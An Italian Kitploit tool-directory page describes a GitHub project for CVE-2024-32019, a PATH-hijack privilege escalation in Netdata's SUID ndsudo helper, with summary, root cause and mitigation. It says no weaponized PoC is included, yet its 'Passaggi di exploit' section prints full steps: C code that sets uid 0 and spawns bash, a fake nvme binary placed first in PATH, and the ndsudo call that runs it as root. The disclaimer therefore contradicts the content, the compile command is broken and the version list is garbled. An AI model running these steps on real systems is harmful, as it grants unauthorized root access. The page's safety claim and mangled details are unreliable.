Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2024-32019-PoC — Verifica l'esposizione all'escalation di privilegi SUID PATH di Netdata ndsudo per CVE-2024-32019 e convalida le patch senza sfruttamento weaponized. | Kitploit
Strumenti/GitHubGitHub/ayub0x7/cve-2024-32019-poc
Strumenti DifensiviEscalation di PrivilegiAnalisi delle VulnerabilitàExploitVirtualizzazione per la SicurezzaPenetration Testing
GitHubayub0x7/cve-2024-32019-poc

cve-2024-32019-PoC

Verifica l'esposizione all'escalation di privilegi SUID PATH di Netdata ndsudo per CVE-2024-32019 e convalida le patch senza sfruttamento weaponized.

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-32019 — Escalatione di privilegi locale in Netdata ndsudo

Riepilogo

L'helper ndsudo di Netdata (installato setuid root) limita i comandi che eseguirà, ma risolve quei comandi usando il PATH del chiamante. Nelle versioni interessate, un utente locale può collocare un binario malevolo all'inizio del PATH e far sì che ndsudo lo esegua con privilegi di root. Corretto in Netdata 1.45.3 e 1.45.0-169.

Interessate / Corrette

  • Interessate: >= 1.44.0-60, < 1.45.0-169 e (secondo l'advisory upstream).

>= 1.45.0, < 1.45.3
  • Corrette: 1.45.3 (stable), 1.45.0-169 (nightly). GitHub

  • Impatto

    Escalatione di privilegi locale a root sui sistemi in cui ndsudo è installato SUID e l'utente può invocarlo (comunemente i membri del gruppo netdata). NVDGitHub

    Causa principale (ad alto livello)

    • ndsudo è SUID-root e inserisce in whitelist sottocomandi come nvme-list, nvme-smart-log, ecc.

    • Chiama eseguibili esterni per nome (ad es. nvme), che vengono risolti tramite PATH invece di usare percorsi assoluti o una ricerca sicura e fissa.

    • Se una directory scrivibile appare prima dei percorsi di sistema, un attaccante può introdurre un binario simile che viene eseguito come root. GitHub

    Riproduzione / Verifica sicura

    Questo repository include checker non-exploit che:

    • Ispezionano /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (o ovunque sia installato) per SUID/proprietà.

    • Enumerano il PATH per directory scrivibili precedenti ai percorsi di sistema comuni.

    • Confermano la presenza di nomi di sottocomandi in whitelist che ndsudo potrebbe tentare di eseguire.

    • Opzionalmente eseguono ndsudo --test <subcommand> per stampare il comando risolto senza eseguirlo (usare con cautela, leggere prima il codice). GitHub

    ⚠️ Nessun PoC weaponizzato è incluso. Questo progetto è per difensori e ricercatori per valutare l'esposizione e convalidare le patch in modo responsabile.

    Mitigazione

    • Aggiornare Netdata a 1.45.3 (stable) o 1.45.0-169 (nightly).

    • Come misura di difesa in profondità, preferire percorsi assoluti o un PATH minimale sanificato negli helper SUID; evitare di concedere accesso non necessario a ndsudo. GitHubwiz.io

    Passaggi di exploit

    1. Salvare il seguente codice C come nvme.c:
    root@kitploit:~
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    
    int main() {
        setuid(0);
        setgid(0);
        execl("/bin/bash", "bash", NULL);
        return 0;
    }
    
    2. Compilare l'exploit
    root@kitploit:~
    gcc nvme.c - nvme
    
    3. Configurazione dell'ambiente
    root@kitploit:~
    mkdir -p /tmp/fakebin
    mv nvme /tmp/fakebin/
    chmod +x /tmp/fakebin/nvme
    
    4. Modificare il PATH
    root@kitploit:~
    export PATH=/tmp/fakebin:$PATH
    
    5. Comando di exploit
    root@kitploit:~
    /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
    

    Riferimenti

    • NVD: CVE-2024-32019. NVD

    • Netdata Advisory (GHSA-pmhq-4cxq-wj93). GitHub

    • Riassunto Wiz. wiz.io

    • Approfondimento Snyk. Vulnerability Guide

    • Elenco MITRE/CVE. CVE

    Scarica lo strumento